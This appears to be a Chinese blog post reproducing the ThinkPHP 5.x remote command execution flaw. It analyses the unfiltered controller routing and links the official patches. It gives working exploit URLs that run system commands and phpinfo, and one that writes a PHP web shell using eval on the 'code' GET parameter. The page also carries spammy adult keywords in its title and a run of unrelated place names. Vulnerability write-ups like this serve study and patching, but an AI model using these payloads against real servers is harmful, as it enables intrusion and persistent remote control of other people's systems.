91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)

發布時間:2020-06-23 04:27:16 來源:網絡 閱讀:9161 作者:DesM0nd 欄目:安全技術
0x00復現環境

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠程命令執行漏洞利用(GetShell)

0x01步驟
  1. 點擊start to hack 進入環境頁面 run the project 然后訪問給出的target address
    執行系統命令顯示目錄下文件
    http://aaa.vsplate.me:52763/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
    【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)

  2. 執行phpinfo
    http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

  3. 寫shell

    http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php
    想你所想,發揮創意

0x02漏洞原理分析
關鍵代碼

【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)
在修復之前程序未對控制器進行過濾,導致攻 擊 者可以通過引入 \ 符號來調用任意類方法。【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)

$this -> app -> controller 方法來實例化控制器,然后調用實例中的方法。
follow the controller method:thinkphp/library/think/App.php
【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)

通過parseModuleAndClass方法解析出$module和$class,實例化$class。

thinkphp / library / think /App.php

【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)
當$name以反斜線\開始時直接將其作為類名。
利用命名空間的特點,如果可以控制此處的$name(即路由中的controller部分),那么就可以實例化任何一個類。

thinkphp/library/think/route/Rule.php
往回看路由解析的代碼,其中route/dispatch/Url.php:: parseUrl方法調用了route/Rule.php:: parseUrlPath來解析pathinfo中的路由信息

route/dispatch/Url.php

【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)

route/Rule.php

【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)
使用/對$url進行分割,未進行任何過濾。

路由url從Request::path()中獲取
【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)

其中,我們來看一下pathinfo函數
【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)
由于var_pathinfo的默認配置為s,我們可利用$_GET['s']來傳遞路由信息,也可利用pathinfo來傳遞
但測試時windows環境下會將$_SERVER['pathinfo']中的\替換為/。結合前面分析可得初步利用代碼如下:
index.php?s=index/\namespace\class/method
這將會實例化\namespace\class類并執行method方法

0x03 漏洞PoC

使用的是pocsuite框架
【漏洞復現】ThinkPHP5 5.x 遠程命令執行(getshell)

0x04 漏洞修復

Thinkphp v5.0.x補丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x補丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

0x05 漏洞利用(目前出現的***手段)

威脅預警 | ThinkPHP v5新漏洞***案例首曝光

0x06 reference

http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC)_%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%88getshell%EF%BC%89/

【2019-1-24更新】發現大佬們的動態調試 下一個復現可以試一試

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

夏河县| 钟祥市| 梨树县| 昌都县| 广安市| 唐海县| 迁西县| 昌乐县| 延寿县| 城固县| 永吉县| 驻马店市| 开原市| 大厂| 涿州市| 镇赉县| 娄底市| 陇西县| 苍梧县| 漳州市| 张家港市| 洛宁县| 建瓯市| 社旗县| 黎川县| 莱阳市| 宜兴市| 调兵山市| 浮山县| 米林县| 青海省| 旬邑县| 周口市| 泰来县| 武隆县| 奉贤区| 岚皋县| 土默特左旗| 丹东市| 广水市| 尖扎县|